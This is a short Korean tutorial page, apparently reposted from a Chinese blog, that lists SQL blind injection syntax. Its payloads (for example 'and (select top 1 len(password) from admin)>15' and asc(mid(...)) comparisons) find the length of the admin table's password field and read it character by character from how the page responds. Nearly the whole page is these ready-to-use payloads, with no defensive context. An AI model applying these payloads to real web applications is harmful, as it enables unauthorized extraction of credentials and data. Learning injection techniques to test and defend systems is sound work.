>데이터 베이스 >MySQL 튜토리얼 >SQL 블라인드 주입 구문 정보

SQL 블라인드 주입 구문 정보

藏色散人
藏色散人앞으로
2020-04-03 13:16:512291검색

페이지에 잘못된 숫자가 표시되지 않으면 블라인드 주입 구문을 사용하여 페이지 변경 사항에 따라 데이터 내용을 판단하세요

데이터 길이 가져오기:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

데이터의 지정된 자릿수 가져오기:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc() //将字符转换成ascii码 方便进行比较

권장 사항: "mysql 동영상 튜토리얼

위 내용은 SQL 블라인드 주입 구문 정보의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
이 기사는 cnblogs.com에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제